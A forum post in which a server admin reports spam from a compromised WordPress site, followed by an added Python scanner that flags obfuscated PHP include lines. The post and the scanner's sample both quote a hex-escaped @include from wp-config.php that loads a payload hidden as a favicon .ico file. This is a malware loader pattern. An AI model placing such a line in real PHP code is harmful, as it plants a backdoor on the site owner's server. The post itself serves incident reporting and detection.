I just noticed a complaint from my ISP (Verizon) that my server was generating complaints. Well, I see 34,000 messages all being sent from a single domain, which is a sandbox. No website, no nothing. I killed all the messages from or to the domain with postsuper, but it keeps generating new spams!!!

Finally I removed the email record from ISPConfig so that domain is no longer recognized. But I was seeing a php-cgi invocation from the user (web45) associated with that website and I kept having to kill -9. Finally I renamed the web folder of the site and that seems to have prevented it. Something was hitting a URL on a site hanging off this, and that hit was causing spam to be generated!

The wp-config.php of the site had a suspicious line at the top:

@include "\x2fvar\x2fwww\x2fhoc\x68eap\x6f.co\x6d/we\x62/st\x61ts/\x66avi\x63on_\x62e65\x346.i\x63o";

That's obviously /var/www/hocheapo.com/web/stats/favicon_something.ico, and maldet was flagging this and quarantining it. But how does it keep being created??? This seems to be dropped in the stats folder, which I renamed. Removing the email record does NOT stop the spam, by the way! Only renaming the root away from /web has stopped it!

Any idea what is doing this? Or how to prevent it 'properly'?? Anything else I need to do to protect against it? Thanks!
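
Added example, not part of the original post: a small Python scanner that decodes the hex and octal escapes PHP accepts in double-quoted strings and reports include/require lines whose target was escaped or is not a PHP file, as with the wp-config.php line quoted above. The function names and the sample file contents are constructed for illustration.

```python
import re
import sys
from pathlib import Path

# include/require (optionally @-silenced) followed by a double-quoted literal
INCLUDE_RE = re.compile(
    r'@?\s*\b(?:include|require)(?:_once)?\b\s*\(?\s*"((?:[^"\\]|\\.)*)"',
    re.IGNORECASE)
# PHP double-quoted escapes handled here: \xH / \xHH (hex) and \N..\NNN (octal)
ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')

def decode_php_escapes(literal):
    """Decode the hex and octal escapes of a PHP double-quoted string."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8) & 0xFF)
    return ESCAPE_RE.sub(repl, literal)

def find_suspicious_includes(php_source):
    """Return (line_number, decoded_path, reasons) for odd include targets."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in INCLUDE_RE.finditer(line):
            raw = m.group(1)
            path = decode_php_escapes(raw)
            reasons = []
            if ESCAPE_RE.search(raw):
                reasons.append("escaped-path")      # path was obfuscated
            if not path.lower().endswith((".php", ".inc")):
                reasons.append("non-php-target")    # e.g. code hidden in .ico
            if reasons:
                hits.append((lineno, path, reasons))
    return hits

# Constructed sample: the include line quoted in the post, above a plain one.
SAMPLE = r'''<?php
@include "\x2fvar\x2fwww\x2fhoc\x68eap\x6f.co\x6d/we\x62/st\x61ts/\x66avi\x63on_\x62e65\x346.i\x63o";
require_once "wp-settings.php";
'''

if __name__ == "__main__":
    # Scan the PHP files named on the command line, or the sample if none.
    for name in sys.argv[1:] or ["-"]:
        src = SAMPLE if name == "-" else Path(name).read_text(errors="replace")
        for hit in find_suspicious_includes(src):
            print(name, *hit)
```

Running it over every PHP file in the account (not only wp-config.php) shows each file that pulls in the dropped payload, which is useful when the file keeps reappearing after quarantine.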